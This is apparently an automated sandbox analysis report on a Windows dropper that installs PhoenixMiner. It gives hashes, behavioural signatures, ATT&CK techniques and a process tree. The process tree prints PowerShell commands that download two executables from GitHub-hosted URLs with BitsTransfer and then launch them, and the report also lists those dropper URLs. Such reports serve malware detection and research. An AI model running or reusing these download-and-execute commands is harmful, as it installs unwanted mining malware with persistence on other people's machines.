Analysis

  • max time kernel
    31s
  • max time network
    33s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-04-2023 01:53

General

  • Target

    3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe

  • Size

    8.3MB

  • MD5

    9ed9ad87a1564fbb5e1b652b3e7148c8

  • SHA1

    0c001b7e9615cbc22eac2a324d8deb7eaf069ff7

  • SHA256

    3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89

  • SHA512

    e49e403a73ff1d10111d23cc70ae95ffae63abbc4a52cfc52c447ee9f15e76ab44f07d0f41e3b3e63a73a07e7748b8ac7ed8c997f1051a10ca5fad1dace4183a

  • SSDEEP

    196608:8eOr3LD6MZ+NL0j/YjNV4p9eLDZPhujwk8kAb+RWvqWd6qmgNSN:8TbnQYiN2eRPhSwhk8s46C4N

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/jkh36/d/main/bild.exe

exe.dropper

https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe

Signatures

  • Detectes Phoenix Miner Payload 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
    "C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4032
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1236
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/jkh36/d/main/bild.exe,https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe -Destination lWr.exe,ck.exe;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:444
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command Start-Process lWr.exe; Start-Process ck.exe;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4464

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    b6deac3351c943410eafe90bc93687c8

    SHA1

    34ff10b6e186ff6f7b6f39ebb127ee137ade5589

    SHA256

    1775d61fb6831a2c572bb51d5772952ee13bbee68bde0367546bb04811a70f0a

    SHA512

    3e025c20277dff003fe09afa2a9014d2fe42761bec935f7d7eb917ddb5b8760d5e3bc643e81d28fa7352c398cbdffcc0dbb5302e7fc6b97969387a3ef313b880

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    19KB

    MD5

    43d16db5550563f8ca4489f116e10ac0

    SHA1

    182954fc7117dfcb720d791e3baaf83fbc897dba

    SHA256

    27b3eaa60f1898de3a74521e1b982822ea850e740da6cd39a5c95a32170819d5

    SHA512

    d0953cca38ecf9440f154840681b9910bab0d94ba7cb7e31959fdba4b1861bb42c8d41ee859bf39d1918927587201e6f63cc0f9e0b010d574a39ad73b32b7d46

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
    Filesize

    8.2MB

    MD5

    c74ab76362f2321b7143e8ba2517c16b

    SHA1

    6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

    SHA256

    938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

    SHA512

    2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
    Filesize

    8.2MB

    MD5

    c74ab76362f2321b7143e8ba2517c16b

    SHA1

    6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

    SHA256

    938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

    SHA512

    2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
    Filesize

    8.2MB

    MD5

    c74ab76362f2321b7143e8ba2517c16b

    SHA1

    6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

    SHA256

    938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

    SHA512

    2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5upflyvs.ej3.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/444-186-0x0000000007B90000-0x0000000008134000-memory.dmp
    Filesize

    5.6MB

  • memory/444-183-0x00000000068A0000-0x0000000006936000-memory.dmp
    Filesize

    600KB

  • memory/444-170-0x0000000005C30000-0x0000000005C96000-memory.dmp
    Filesize

    408KB

  • memory/444-168-0x0000000004D50000-0x0000000004D60000-memory.dmp
    Filesize

    64KB

  • memory/444-176-0x0000000005CA0000-0x0000000005D06000-memory.dmp
    Filesize

    408KB

  • memory/444-181-0x0000000006330000-0x000000000634E000-memory.dmp
    Filesize

    120KB

  • memory/444-182-0x0000000004D50000-0x0000000004D60000-memory.dmp
    Filesize

    64KB

  • memory/444-165-0x0000000004DA0000-0x0000000004DD6000-memory.dmp
    Filesize

    216KB

  • memory/444-184-0x0000000006830000-0x000000000684A000-memory.dmp
    Filesize

    104KB

  • memory/444-185-0x0000000006940000-0x0000000006962000-memory.dmp
    Filesize

    136KB

  • memory/444-167-0x0000000004D50000-0x0000000004D60000-memory.dmp
    Filesize

    64KB

  • memory/444-187-0x0000000007740000-0x0000000007754000-memory.dmp
    Filesize

    80KB

  • memory/444-166-0x0000000005410000-0x0000000005A38000-memory.dmp
    Filesize

    6.2MB

  • memory/444-169-0x0000000005360000-0x0000000005382000-memory.dmp
    Filesize

    136KB

  • memory/4464-191-0x0000000005290000-0x00000000052A0000-memory.dmp
    Filesize

    64KB

  • memory/4464-192-0x0000000005290000-0x00000000052A0000-memory.dmp
    Filesize

    64KB

  • memory/4464-204-0x00000000078C0000-0x00000000078F2000-memory.dmp
    Filesize

    200KB

  • memory/4464-203-0x000000007FC90000-0x000000007FCA0000-memory.dmp
    Filesize

    64KB

  • memory/4464-205-0x000000006F240000-0x000000006F28C000-memory.dmp
    Filesize

    304KB

  • memory/4464-215-0x0000000007880000-0x000000000789E000-memory.dmp
    Filesize

    120KB

  • memory/4464-216-0x00000000089E0000-0x000000000905A000-memory.dmp
    Filesize

    6.5MB

  • memory/4464-217-0x0000000007A80000-0x0000000007A8A000-memory.dmp
    Filesize

    40KB

  • memory/4464-218-0x0000000005290000-0x00000000052A0000-memory.dmp
    Filesize

    64KB

  • memory/4464-219-0x0000000007C00000-0x0000000007C0E000-memory.dmp
    Filesize

    56KB

  • memory/4464-220-0x0000000007C80000-0x0000000007C9A000-memory.dmp
    Filesize

    104KB

  • memory/4464-221-0x0000000007C70000-0x0000000007C78000-memory.dmp
    Filesize

    32KB